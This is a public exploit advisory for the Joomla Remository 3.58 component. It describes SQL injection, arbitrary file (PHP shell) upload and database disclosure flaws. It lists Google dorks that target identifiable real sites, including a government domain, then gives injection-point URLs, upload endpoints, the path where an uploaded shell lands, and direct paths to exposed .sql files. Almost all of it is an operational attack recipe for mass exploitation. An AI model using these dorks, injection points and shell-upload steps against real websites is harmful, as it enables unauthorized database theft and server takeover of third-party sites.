####################################################################

# Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : remository.com
# Software Download Link : remository.com/downloads/joomla-3.x-software/
# Software Information Link : extensions.joomla.org/extension/remository/
# Software Version : 3.58
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_remository''
inurl:''/administrator/components/com_remository/''
intext:Site Designed By Conservation Designs
intext:CCCV Gabriel Valencia site:gob.ec
intext:Web creada por softdream.es
intext:Sponsored by Innovatron - Managed by Spirtech
intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
intext:Web design by Mercury Web Solutions
intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019010284
packetstormsecurity.com/files/151433/Joomla-Remository-3.58-Database-Disclosure-Shell-Upload-SQL-Injection.html

####################################################################

# Description about Software :
***************************

“Remository” is open source software for Joomla.

####################################################################

# Impact :
***********

*Attackers can exploit this issue via a browser.

The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers 

upload arbitrary files/shell upload because the application fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and run it in the 

context of the webserver process. This may facilitate unauthorized access or 

privilege escalation; other attacks are also possible.

* An attacker might be able inject and/or alter existing 

SQL statements which would influence the database exchange.

* SQL injection vulnerability in the Joomla Remository Components 3.58 because,

it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read,

access or modify data, or exploit latent vulnerabilities in the underlying database. 

If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_remository&Itemid=[SQL Injection]

/index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
[ID-NUMBER]&orderby=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
[ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=
[ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]

####################################################################

# Arbitrary File Upload Exploit :
****************************
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles

/index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]

/index.php/shared-file-repository/func-addmanyfiles/

Directory File Path :
******************

Search your file here. 

/components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php

/components/com_remository_files/......

Note : If websites are not vulnerable it says ;

You have no permitted upload categories - please refer to the webmaster

####################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_remository/assignment.sql

/administrator/components/com_remository/blob.sql

/administrator/components/com_remository/containers.sql

/administrator/components/com_remository/file.sql

/administrator/components/com_remository/log.sql

/administrator/components/com_remository/permission.sql

/administrator/components/com_remository/repository.sql

/administrator/components/com_remository/reviews.sql

/administrator/components/com_remository/structure.sql

/administrator/components/com_remository/text.sql

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################